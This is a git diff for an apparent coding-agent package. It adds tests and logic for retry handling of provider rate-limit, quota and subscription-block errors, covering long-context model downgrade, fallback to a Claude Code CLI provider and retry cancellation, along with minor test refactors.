+			const { deps, emittedEvents, findModel } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6[1m]"),
+				markUsageLimitReachedResult: false, // no alternate credentials
+				fallbackResult: null, // no cross-provider fallback
+				findModelResult: () => undefined, // no base model either
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage(
+				'429 {"type":"error","error":{"type":"rate_limit_error","message":"Extra usage is required for long context requests."}}'
+			);
+
+			const result = await handler.handleRetryableError(msg);
+
+			// Should NOT retry (would be true if misclassified as rate_limit entering backoff)
+			assert.equal(result, false);
+
+			// Should emit fallback_chain_exhausted (quota_exhausted path), NOT auto_retry_start (backoff path)
+			const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted");
+			assert.ok(chainExhausted, "Expected fallback_chain_exhausted event for entitlement error");
+
+			const retryStart = emittedEvents.find((e) => e.type === "auto_retry_start");
+			assert.equal(retryStart, undefined, "Should NOT emit auto_retry_start for entitlement error");
+		});
+
+		it("still classifies regular 429 rate limits as rate_limit", async () => {
+			// A normal "rate limit" 429 should still be classified as rate_limit
+			const { deps, emittedEvents } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: null,
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("429 Too Many Requests");
+
+			const result = await handler.handleRetryableError(msg);
+
+			// Should enter the backoff loop (rate_limit path, not quota_exhausted)
+			assert.equal(result, true);
+
+			const retryStart = emittedEvents.find((e) => e.type === "auto_retry_start");
+			assert.ok(retryStart, "Regular 429 should enter backoff retry");
+		});
+	});
+
+	describe("long-context model downgrade", () => {
+		it("downgrades from [1m] to base model when entitlement error and no fallback", async () => {
+			const baseModel = createMockModel("anthropic", "claude-opus-4-6");
+			const { deps, emittedEvents, onModelChangeFn, continueFn } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6[1m]"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: null,
+				findModelResult: (provider: string, modelId: string) => {
+					if (provider === "anthropic" && modelId === "claude-opus-4-6") return baseModel;
+					return undefined;
+				},
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("Extra usage is required for long context requests.");
+
+			const result = await handler.handleRetryableError(msg);
+
+			assert.equal(result, true, "Should retry after downgrade");
+
+			// Should have called setModel with the base model
+			const setModelCalls = (deps.agent.setModel as any).mock.calls;
+			assert.equal(setModelCalls.length, 1);
+			assert.equal(setModelCalls[0].arguments[0].id, "claude-opus-4-6");
+
+			// Should have notified about model change
+			assert.equal(onModelChangeFn.mock.calls.length, 1);
+
+			// Should emit a fallback_provider_switch event indicating downgrade
+			const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch");
+			assert.ok(switchEvent, "Expected fallback_provider_switch event for downgrade");
+			assert.ok(switchEvent!.reason.includes("long context downgrade"), `reason should mention downgrade: ${switchEvent!.reason}`);
+		});
+
+		it("emits fallback_chain_exhausted when base model is also unavailable", async () => {
+			const { deps, emittedEvents } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6[1m]"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: null,
+				findModelResult: () => undefined, // base model not found
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("Extra usage is required for long context requests.");
+
+			const result = await handler.handleRetryableError(msg);
+
+			assert.equal(result, false);
+			const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted");
+			assert.ok(chainExhausted, "Expected fallback_chain_exhausted when base model unavailable");
+		});
+
+		it("does not attempt downgrade for non-[1m] models", async () => {
+			// When a regular model (no [1m] suffix) gets a quota_exhausted error
+			// with no fallback, it should just stop — no downgrade attempt.
+			const { deps, emittedEvents } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: null,
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("Extra usage is required for long context requests.");
+
+			const result = await handler.handleRetryableError(msg);
+
+			assert.equal(result, false);
+			const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted");
+			assert.ok(chainExhausted);
+
+			// No downgrade switch should occur
+			const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch");
+			assert.equal(switchEvent, undefined, "Should not switch for non-[1m] models");
+		});
+	});
+
+	describe("retry cancellation", () => {
+		it("cancels queued immediate continue callbacks when retry is aborted", async () => {
+			const { deps, emittedEvents, continueFn } = createMockDeps({
+				markUsageLimitReachedResult: true,
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("429 Too Many Requests");
+
+			const result = await handler.handleRetryableError(msg);
+			assert.equal(result, true, "retry should be initiated");
+
+			handler.abortRetry();
+			await new Promise((resolve) => setTimeout(resolve, 10));
+
+			assert.equal(continueFn.mock.calls.length, 0, "cancelled retry must not continue after explicit abort");
+			const endEvents = emittedEvents.filter((e) => e.type === "auto_retry_end");
+			assert.equal(endEvents.length, 1, "retry cancellation should emit a single auto_retry_end event");
+			assert.equal(endEvents[0]?.finalError, "Retry cancelled");
+		});
+	});
+
+	describe("isRetryableError", () => {
+		it("considers long-context entitlement error as retryable", () => {
+			const { deps } = createMockDeps();
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("Extra usage is required for long context requests.");
+			assert.equal(handler.isRetryableError(msg), true);
+		});
+
+		it("does NOT consider credential cooldown error as retryable (#3429)", () => {
+			// The credential cooldown message from getApiKey() must not re-enter
+			// the retry handler. Re-entry creates cascading empty error entries
+			// in the session file that break resume.
+			const { deps } = createMockDeps();
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage(
+				'All credentials for "anthropic" are in a cooldown window. ' +
+				'Please wait a moment and try again, or switch to a different provider.',
+			);
+			assert.equal(handler.isRetryableError(msg), false);
+		});
+	});
+
+	describe("third-party block claude-code fallback (#3772)", () => {
+		it("switches to claude-code provider when current provider is anthropic", async () => {
+			const ccModel = createMockModel("claude-code", "claude-opus-4-6");
+			const { deps, emittedEvents, onModelChangeFn } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6"),
+				findModelResult: (provider: string, modelId: string) => {
+					if (provider === "claude-code" && modelId === "claude-opus-4-6") return ccModel;
+					return undefined;
+				},
+			});
+			deps.isClaudeCodeReady = () => true;
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("third-party apps cannot draw from extra usage");
+
+			const result = await handler.handleRetryableError(msg);
+
+			assert.equal(result, true, "should retry via claude-code fallback");
+			const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch");
+			assert.ok(switchEvent, "Expected fallback_provider_switch event");
+			assert.ok(switchEvent!.to.startsWith("claude-code/"), "Should switch to claude-code provider");
+		});
+
+		it("switches to claude-code on 'out of extra usage' error (#3772)", async () => {
+			const ccModel = createMockModel("claude-code", "claude-opus-4-6");
+			const { deps, emittedEvents } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6"),
+				findModelResult: (provider: string, modelId: string) => {
+					if (provider === "claude-code" && modelId === "claude-opus-4-6") return ccModel;
+					return undefined;
+				},
+			});
+			deps.isClaudeCodeReady = () => true;
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("You're out of extra usage. Add more at claude.ai/settings/usage and keep going.");
+
+			const result = await handler.handleRetryableError(msg);
+
+			assert.equal(result, true, "should retry via claude-code fallback");
+			const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch");
+			assert.ok(switchEvent, "Expected fallback_provider_switch event");
+			assert.ok(switchEvent!.to.startsWith("claude-code/"), "Should switch to claude-code provider");
+		});
+
+		it("does NOT switch to claude-code when current provider is not anthropic", async () => {
+			const ccModel = createMockModel("claude-code", "gpt-4o");
+			const { deps, emittedEvents } = createMockDeps({
+				model: createMockModel("openai", "gpt-4o"),
+				findModelResult: (provider: string, modelId: string) => {
+					if (provider === "claude-code" && modelId === "gpt-4o") return ccModel;
+					return undefined;
+				},
+			});
+			deps.isClaudeCodeReady = () => true;
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("third-party apps are not supported for this plan");
+
+			const result = await handler.handleRetryableError(msg);
+
+			// Should NOT have triggered the claude-code fallback
+			const switchEvent = emittedEvents.find(
+				(e) => e.type === "fallback_provider_switch" && e.to?.startsWith("claude-code/"),
+			);
+			assert.equal(switchEvent, undefined, "Should NOT switch non-anthropic provider to claude-code");
+		});
+	});
+
+	describe("quota_exhausted credential backoff (#3430)", () => {
+		it("does NOT call markUsageLimitReached for quota_exhausted errors", async () => {
+			// "Extra usage is required" is an account-level billing gate.
+			// Backing off the credential for 30 minutes blocks all provider
+			// requests and has no effect on the billing condition.
+			const { deps, markUsageLimitReached } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6[1m]"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: null,
+				findModelResult: () => undefined,
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage(
+				'429 {"type":"error","error":{"type":"rate_limit_error","message":"Extra usage is required for long context requests."}}',
+			);
+
+			await handler.handleRetryableError(msg);
+
+			assert.equal(
+				markUsageLimitReached.mock.calls.length,
+				0,
+				"markUsageLimitReached must NOT be called for quota_exhausted errors",
+			);
+		});
+
+		it("still calls markUsageLimitReached for regular rate_limit errors", async () => {
+			const { deps, markUsageLimitReached } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: null,
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("429 Too Many Requests");
+
+			await handler.handleRetryableError(msg);
+
+			assert.equal(
+				markUsageLimitReached.mock.calls.length,
+				1,
+				"markUsageLimitReached should be called for rate_limit errors",
+			);
+		});
+
+		it("still tries cross-provider fallback for quota_exhausted without credential backoff", async () => {
+			const fallbackModel = createMockModel("openai", "gpt-4o");
+			const { deps, markUsageLimitReached, continueFn } = createMockDeps({
+				model: createMockModel("anthropic", "claude-opus-4-6[1m]"),
+				markUsageLimitReachedResult: false,
+				fallbackResult: { model: fallbackModel, reason: "cross-provider fallback" },
+			});
+
+			const handler = new RetryHandler(deps);
+			const msg = errorMessage("Extra usage is required for long context requests.");
+
+			const result = await handler.handleRetryableError(msg);
+
+			assert.equal(result, true, "should retry with fallback provider");
+			assert.equal(
+				markUsageLimitReached.mock.calls.length,
+				0,
+				"should NOT back off credentials before trying fallback",
+			);
+		});
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/retry-handler.ts b/packages/pi-coding-agent/src/core/retry-handler.ts
index f44733086..78d12c8ba 100644
--- a/packages/pi-coding-agent/src/core/retry-handler.ts
+++ b/packages/pi-coding-agent/src/core/retry-handler.ts
@@ -30,6 +30,9 @@ export interface RetryHandlerDeps {
 	emit: (event: AgentSessionEvent) => void;
 	/** Called when the retry handler switches to a fallback model */
 	onModelChange: (model: Model<any>) => void;
+	/** Optional: check if the claude-code CLI provider is ready (installed + authed).
+	 * Injected from the app layer to preserve package boundary. */
+	isClaudeCodeReady?: () => boolean;
 }
 
 export class RetryHandler {
@@ -37,6 +40,8 @@ export class RetryHandler {
 	private _retryAttempt = 0;
 	private _retryPromise: Promise<void> | undefined = undefined;
 	private _retryResolve: (() => void) | undefined = undefined;
+	private _retryGeneration = 0;
+	private _continueTimeout: ReturnType<typeof setTimeout> | undefined = undefined;
 
 	constructor(private readonly _deps: RetryHandlerDeps) {}
 
@@ -107,7 +112,11 @@ export class RetryHandler {
 		if (isContextOverflow(message, contextWindow)) return false;
 
 		const err = message.errorMessage;
-		return /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|temporarily backed off/i.test(
+		// "temporarily backed off" is intentionally excluded: it is an internally-
+		// generated error from getApiKey() when credentials are in a backoff window.
+		// Re-entering the retry handler for that message creates a cascade of empty
+		// error entries in the session file, breaking resume (#3429).
+		return /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|extra usage is required|(?:out of|no) extra usage|third.party.*draw from extra|third.party.*not.*available/i.test(
 			err,
 		);
 	}
@@ -134,38 +143,54 @@ export class RetryHandler {
 		}
 
 		// Try credential fallback before counting against retry budget.
+		const retryGeneration = this._retryGeneration;
 		if (this._deps.getModel() && message.errorMessage) {
-			const errorType = this._classifyErrorType(message.errorMessage);
-			const isCredentialError = errorType !== "unknown";
-			const hasAlternate =
-				isCredentialError &&
-				this._deps.modelRegistry.authStorage.markUsageLimitReached(
-					this._deps.getModel()!.provider,
-					this._deps.getSessionId(),
-					{ errorType },
-				);
-
-			if (hasAlternate) {
-				this._removeLastAssistantError();
-
-				this._deps.emit({
-					type: "auto_retry_start",
-					attempt: this._retryAttempt + 1,
-					maxAttempts: settings.maxRetries,
-					delayMs: 0,
-					errorMessage: `${message.errorMessage} (switching credential)`,
-				});
-
-				// Retry immediately with the next credential - don't increment _retryAttempt
-				setTimeout(() => {
-					this._deps.agent.continue().catch(() => {});
-				}, 0);
-
-				return true;
+			// Third-party subscription block (#3772): Anthropic blocks third-party apps
+			// from using Pro/Max subscription quotas. If the claude-code CLI provider is
+			// available, switch to it immediately — credential rotation won't help.
+			if (this._isThirdPartyBlock(message.errorMessage)) {
+				const switched = this._tryClaudeCodeFallback(message, retryGeneration);
+				if (switched) return true;
+				// CLI not available — fall through to standard error handling
 			}
 
-			// All credentials are backed off. Try cross-provider fallback before giving up.
-			if (isCredentialError) {
+			const errorType = this._classifyErrorType(message.errorMessage);
+			const isRateLimit = errorType === "rate_limit";
+			const isQuotaError = errorType === "quota_exhausted";
+
+			// Credential rotation — only for transient rate limits (#3430).
+			// Quota errors ("Extra usage is required") are account-level billing
+			// gates; rotating to another credential on the same account won't help
+			// and the 30-minute backoff blocks all provider requests needlessly.
+			if (isRateLimit) {
+				const hasAlternate =
+					this._deps.modelRegistry.authStorage.markUsageLimitReached(
+						this._deps.getModel()!.provider,
+						this._deps.getSessionId(),
+						{ errorType },
+					);
+
+				if (hasAlternate) {
+					this._removeLastAssistantError();
+
+					this._deps.emit({
+						type: "auto_retry_start",
+						attempt: this._retryAttempt + 1,
+						maxAttempts: settings.maxRetries,
+						delayMs: 0,
+						errorMessage: `${message.errorMessage} (switching credential)`,
+					});
+
+					// Retry immediately with the next credential - don't increment _retryAttempt
+					this._scheduleContinue(retryGeneration);
+
+					return true;
+				}
+			}
+
+			// Cross-provider fallback — for rate limits with all creds backed off,
+			// or quota errors (which skip credential backoff entirely).
+			if (isRateLimit || isQuotaError) {
 				const fallbackResult = await this._deps.fallbackResolver.findFallback(
 					this._deps.getModel()!,
 					errorType,
@@ -193,15 +218,17 @@ export class RetryHandler {
 					});
 
 					// Retry immediately with fallback provider - don't increment _retryAttempt
-					setTimeout(() => {
-						this._deps.agent.continue().catch(() => {});
-					}, 0);
+					this._scheduleContinue(retryGeneration);
 
 					return true;
 				}
 
 				// No fallback available either
-				if (errorType === "quota_exhausted") {
+				if (isQuotaError) {
+					// Try long-context model downgrade ([1m] → base) before giving up
+					const downgraded = this._tryLongContextDowngrade(message, retryGeneration);
+					if (downgraded) return true;
+
 					this._deps.emit({
 						type: "fallback_chain_exhausted",
 						reason: `All providers exhausted for ${this._deps.getModel()!.provider}/${this._deps.getModel()!.id}`,
@@ -270,7 +297,12 @@ export class RetryHandler {
 		try {
 			await sleep(delayMs, this._retryAbortController.signal);
 		} catch {
-			// Aborted during sleep
+			// Aborted during sleep. If the retry generation already advanced, this
+			// cancellation was handled externally (e.g. explicit model switch).
+			if (retryGeneration !== this._retryGeneration) {
+				this._retryAbortController = undefined;
+				return false;
+			}
 			const attempt = this._retryAttempt;
 			this._retryAttempt = 0;
 			this._retryAbortController = undefined;
@@ -286,16 +318,36 @@ export class RetryHandler {
 		this._retryAbortController = undefined;
 
 		// Retry via continue() - use setTimeout to break out of event handler chain
-		setTimeout(() => {
-			this._deps.agent.continue().catch(() => {});
-		}, 0);
+		this._scheduleContinue(retryGeneration);
 
 		return true;
 	}
 
 	/** Cancel in-progress retry */
 	abortRetry(): void {
-		this._retryAbortController?.abort();
+		const hadRetry =
+			this._retryPromise !== undefined
+			|| this._retryAbortController !== undefined
+			|| this._continueTimeout !== undefined;
+		if (!hadRetry) return;
+
+		const attempt = this._retryAttempt > 0 ? this._retryAttempt : 1;
+		this._retryGeneration++;
+		if (this._continueTimeout) {
+			clearTimeout(this._continueTimeout);
+			this._continueTimeout = undefined;
+		}
+		if (this._retryAbortController) {
+			this._retryAbortController.abort();
+			this._retryAbortController = undefined;
+		}
+		this._retryAttempt = 0;
+		this._deps.emit({
+			type: "auto_retry_end",
+			success: false,
+			attempt,
+			finalError: "Retry cancelled",
+		});
 		this._resolveRetry();
 	}
 
@@ -326,6 +378,17 @@ export class RetryHandler {
 		}
 	}
 
+	private _scheduleContinue(retryGeneration: number): void {
+		if (this._continueTimeout) {
+			clearTimeout(this._continueTimeout);
+		}
+		this._continueTimeout = setTimeout(() => {
+			this._continueTimeout = undefined;
+			if (retryGeneration !== this._retryGeneration) return;
+			this._deps.agent.continue().catch(() => {});
+		}, 0);
+	}
+
 	private _findLastAssistantInMessages(
 		messages: Array<{ role: string } & Record<string, any>>,
 	): AssistantMessage | undefined {
@@ -343,12 +406,110 @@ export class RetryHandler {
 	 */
 	private _classifyErrorType(errorMessage: string): UsageLimitErrorType {
 		const err = errorMessage.toLowerCase();
+		// Long-context entitlement errors are billing gates, not transient rate limits.
+		// Must be checked before the generic 429/rate_limit regex.
+		if (/extra usage is required|long context required/i.test(err)) return "quota_exhausted";
 		if (/quota|billing|exceeded.*limit|usage.*limit/i.test(err)) return "quota_exhausted";
 		if (/rate.?limit|too many requests|429/i.test(err)) return "rate_limit";
 		if (/500|502|503|504|server.?error|internal.?error|service.?unavailable/i.test(err)) return "server_error";
 		return "unknown";
 	}
 
+	/**
+	 * Attempt to downgrade a long-context model (e.g. claude-opus-4-6[1m]) to its
+	 * base model (claude-opus-4-6) when the account lacks the long-context billing
+	 * entitlement. Returns true if the downgrade was initiated.
+	 */
+	private _tryLongContextDowngrade(message: AssistantMessage, retryGeneration: number): boolean {
+		const currentModel = this._deps.getModel();
+		if (!currentModel) return false;
+
+		// Only attempt downgrade for [1m] (or similar long-context) model IDs
+		const match = currentModel.id.match(/^(.+)\[\d+m\]$/);
+		if (!match) return false;
+
+		const baseModelId = match[1];
+		const baseModel = this._deps.modelRegistry.find(currentModel.provider, baseModelId);
+		if (!baseModel) return false;
+
+		const previousId = currentModel.id;
+		this._deps.agent.setModel(baseModel);
+		this._deps.onModelChange(baseModel);
+		this._removeLastAssistantError();
+
+		this._deps.emit({
+			type: "fallback_provider_switch",
+			from: `${currentModel.provider}/${previousId}`,
+			to: `${baseModel.provider}/${baseModel.id}`,
+			reason: `long context downgrade: ${previousId} → ${baseModel.id}`,
+		});
+
+		this._deps.emit({
+			type: "auto_retry_start",
+			attempt: this._retryAttempt + 1,
+			maxAttempts: this._deps.settingsManager.getRetrySettings().maxRetries,
+			delayMs: 0,
+			errorMessage: `${message.errorMessage} (long context downgrade)`,
+		});
+
+		this._scheduleContinue(retryGeneration);
+
+		return true;
+	}
+
+	/**
+	 * Detect Anthropic subscription block errors (#3772).
+	 * These are hard policy blocks, not transient rate limits — credential
+	 * rotation will not help. Matches both the explicit "third-party" message
+	 * and the "out of extra usage" variant that subscription users receive.
+	 */
+	private _isThirdPartyBlock(errorMessage: string): boolean {
+		return /third[- .]party.*(?:draw from extra|not.*available|plan limits|not permitted|cannot be used|not supported)|(?:out of|no) extra usage/i.test(errorMessage);
+	}
+
+	/**
+	 * Attempt to switch to the claude-code CLI provider when the current
+	 * Anthropic provider is blocked by the third-party policy (#3772).
+	 * Returns true if the switch was made and retry scheduled.
+	 */
+	private _tryClaudeCodeFallback(message: AssistantMessage, retryGeneration: number): boolean {
+		if (!this._deps.isClaudeCodeReady?.()) return false;
+
+		const currentModel = this._deps.getModel();
+		if (!currentModel) return false;
+
+		// Only attempt claude-code fallback when the current provider is anthropic.
+		// Other providers may produce similar error text but should not be rerouted.
+		if (currentModel.provider !== "anthropic") return false;
+
+		// Find the same model ID under the claude-code provider
+		const ccModel = this._deps.modelRegistry.find("claude-code", currentModel.id);
+		if (!ccModel) return false;
+
+		const previousProvider = currentModel.provider;
+		this._deps.agent.setModel(ccModel);
+		this._deps.onModelChange(ccModel);
+		this._removeLastAssistantError();
+
+		this._deps.emit({
+			type: "fallback_provider_switch",
+			from: `${previousProvider}/${currentModel.id}`,
+			to: `claude-code/${ccModel.id}`,
+			reason: "Anthropic subscription blocked for third-party apps — routing through Claude Code CLI",
+		});
+
+		this._deps.emit({
+			type: "auto_retry_start",
+			attempt: this._retryAttempt + 1,
+			maxAttempts: this._deps.settingsManager.getRetrySettings().maxRetries,
+			delayMs: 0,
+			errorMessage: `${message.errorMessage} (switching to Claude Code CLI)`,
+		});
+
+		this._scheduleContinue(retryGeneration);
+		return true;
+	}
+
 	/** Remove the last assistant error message from agent state */
 	private _removeLastAssistantError(): void {
 		const messages = this._deps.agent.state.messages;
diff --git a/packages/pi-coding-agent/src/core/sdk.ts b/packages/pi-coding-agent/src/core/sdk.ts
index 97e8c5f5e..a0c2d943b 100644
--- a/packages/pi-coding-agent/src/core/sdk.ts
+++ b/packages/pi-coding-agent/src/core/sdk.ts
@@ -75,6 +75,10 @@ export interface CreateAgentSessionOptions {
 
 	/** Settings manager. Default: SettingsManager.create(cwd, agentDir) */
 	settingsManager?: SettingsManager;
+
+	/** Optional: check if the claude-code CLI provider is ready (installed + authed).
+	 * Passed to RetryHandler for third-party block recovery (#3772). */
+	isClaudeCodeReady?: () => boolean;
 }
 
 /** Result from createAgentSession */
@@ -214,6 +218,16 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {}
 		}
 	}
 
+	// Flush extension provider registrations so extension-provided models (e.g. claude-code/*)
+	// are available in the registry before model resolution. Without this, findInitialModel()
+	// cannot find extension models and falls back to built-in providers (#3534).
+	const extensionsForModelResolution = resourceLoader.getExtensions();
+	for (const { name, config } of extensionsForModelResolution.runtime.pendingProviderRegistrations) {
+		modelRegistry.registerProvider(name, config);
+	}
+	// Clear the queue so bindCore() doesn't re-register the same providers.
+	extensionsForModelResolution.runtime.pendingProviderRegistrations = [];
+
 	// If still no model, use findInitialModel (checks settings default, then provider defaults)
 	if (!model) {
 		const result = await findInitialModel({
@@ -326,6 +340,7 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {}
 		transport: settingsManager.getTransport(),
 		thinkingBudgets: settingsManager.getThinkingBudgets(),
 		maxRetryDelayMs: settingsManager.getRetrySettings().maxDelayMs,
+		externalToolExecution: (m) => modelRegistry.getProviderAuthMode(m.provider) === "externalCli",
 		getApiKey: async (provider) => {
 			// Use the provider argument from the in-flight request;
 			// agent.state.model may already be switched mid-turn.
@@ -333,6 +348,10 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {}
 			if (!resolvedProvider) {
 				throw new Error("No model selected");
 			}
+			const authMode = modelRegistry.getProviderAuthMode(resolvedProvider);
+			if (authMode === "externalCli" || authMode === "none") {
+				return undefined;
+			}
 
 			// Retry key resolution with backoff to handle transient network failures
 			// (e.g., OAuth token refresh failing due to brief connectivity loss).
@@ -356,16 +375,16 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {}
 				await new Promise(resolve => setTimeout(resolve, baseDelayMs * attempt));
 			}
 
-			// All retries exhausted — throw descriptive error
-			// Check if credentials exist but are temporarily backed off
-			// (e.g., after a 429 quota exhaustion). Provide a specific error
-			// so the retry handler knows this is transient, not a permanent
-			// auth failure.
+			// All retries exhausted — throw descriptive error.
+			// Check if credentials exist but are temporarily in a backoff window
+			// (e.g., after a 429). This message intentionally avoids phrases like
+			// "rate limit" / "429" to prevent isRetryableError() from re-entering
+			// the retry handler and creating cascading error entries (#3429).
 			const hasAuth = modelRegistry.authStorage.hasAuth(resolvedProvider);
 			if (hasAuth) {
 				throw new Error(
-					`All credentials for "${resolvedProvider}" are temporarily backed off due to rate limiting. ` +
-						`The request will be retried automatically when backoff expires.`,
+					`All credentials for "${resolvedProvider}" are in a cooldown window. ` +
+						`Please wait a moment and try again, or switch to a different provider.`,
 				);
 			}
 			const model = agent.state.model;
@@ -375,8 +394,8 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {}
 				// surface a specific message instead of the misleading "Authentication failed".
 				if (modelRegistry.authStorage.areAllCredentialsBackedOff(resolvedProvider)) {
 					throw new Error(
-						`Rate limit in effect for "${resolvedProvider}". ` +
-							`Please wait before retrying or switch to a different model.`,
+						`All credentials for "${resolvedProvider}" are in a cooldown window. ` +
+							`Please wait a moment and try again, or switch to a different provider.`,
 					);
 				}
 				throw new Error(
@@ -417,6 +436,7 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {}
 		modelRegistry,
 		initialActiveToolNames,
 		extensionRunnerRef,
+		isClaudeCodeReady: options.isClaudeCodeReady,
 	});
 	const extensionsResult = resourceLoader.getExtensions();
 
diff --git a/packages/pi-coding-agent/src/core/session-manager.test.ts b/packages/pi-coding-agent/src/core/session-manager.test.ts
index 7a115443d..470336567 100644
--- a/packages/pi-coding-agent/src/core/session-manager.test.ts
+++ b/packages/pi-coding-agent/src/core/session-manager.test.ts
@@ -1,5 +1,5 @@
 import assert from "node:assert/strict";
-import { describe, it } from "node:test";
+import { describe, it, afterEach } from "node:test";
 import { mkdtempSync, rmSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
@@ -22,44 +22,44 @@ function makeAssistantMessage(input: number, output: number, cacheRead = 0, cach
 }
 
 describe("SessionManager usage totals", () => {
-	it("tracks assistant usage incrementally without rescanning entries", () => {
-		const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
-		try {
-			const manager = SessionManager.create(dir, dir);
+	let dir: string;
 
-			manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any);
-			manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25));
-			manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1));
-
-			assert.deepEqual(manager.getUsageTotals(), {
-				input: 17,
-				output: 9,
-				cacheRead: 4,
-				cacheWrite: 2,
-				cost: 0.35,
-			});
-		} finally {
+	afterEach(() => {
+		if (dir) {
 			rmSync(dir, { recursive: true, force: true });
 		}
 	});
 
+	it("tracks assistant usage incrementally without rescanning entries", () => {
+		dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
+		const manager = SessionManager.create(dir, dir);
+
+		manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any);
+		manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25));
+		manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1));
+
+		assert.deepEqual(manager.getUsageTotals(), {
+			input: 17,
+			output: 9,
+			cacheRead: 4,
+			cacheWrite: 2,
+			cost: 0.35,
+		});
+	});
+
 	it("resets totals when starting a new session", () => {
-		const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
-		try {
-			const manager = SessionManager.create(dir, dir);
-			manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05));
-			assert.equal(manager.getUsageTotals().input, 5);
+		dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
+		const manager = SessionManager.create(dir, dir);
+		manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05));
+		assert.equal(manager.getUsageTotals().input, 5);
 
-			manager.newSession();
-			assert.deepEqual(manager.getUsageTotals(), {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-				cost: 0,
-			});
-		} finally {
-			rmSync(dir, { recursive: true, force: true });
-		}
+		manager.newSession();
+		assert.deepEqual(manager.getUsageTotals(), {
+			input: 0,
+			output: 0,
+			cacheRead: 0,
+			cacheWrite: 0,
+			cost: 0,
+		});
 	});
 });
diff --git a/packages/pi-coding-agent/src/core/settings-manager-security.test.ts b/packages/pi-coding-agent/src/core/settings-manager-security.test.ts
new file mode 100644
index 000000000..b052a2bd6
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/settings-manager-security.test.ts
@@ -0,0 +1,102 @@
+import { describe, it, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { SettingsManager } from "./settings-manager.js";
+import { CONFIG_DIR_NAME } from "../config.js";
+
+function makeTempDirs() {
+  const base = mkdtempSync(join(tmpdir(), "settings-security-test-"));
+  const agentDir = join(base, "agent");
+  const cwd = join(base, "project");
+  mkdirSync(agentDir, { recursive: true });
+  mkdirSync(join(cwd, CONFIG_DIR_NAME), { recursive: true });
+  return { base, agentDir, cwd };
+}
+
+describe("SettingsManager — global-only security settings", () => {
+  let tmpBase: string | undefined;
+
+  afterEach(() => {
+    if (tmpBase) {
+      rmSync(tmpBase, { recursive: true, force: true });
+      tmpBase = undefined;
+    }
+  });
+
+  it("returns allowedCommandPrefixes set via setAllowedCommandPrefixes", () => {
+    const sm = SettingsManager.inMemory();
+    assert.equal(sm.getAllowedCommandPrefixes(), undefined);
+    sm.setAllowedCommandPrefixes(["sops", "doppler"]);
+    assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops", "doppler"]);
+  });
+
+  it("returns fetchAllowedUrls set via setFetchAllowedUrls", () => {
+    const sm = SettingsManager.inMemory();
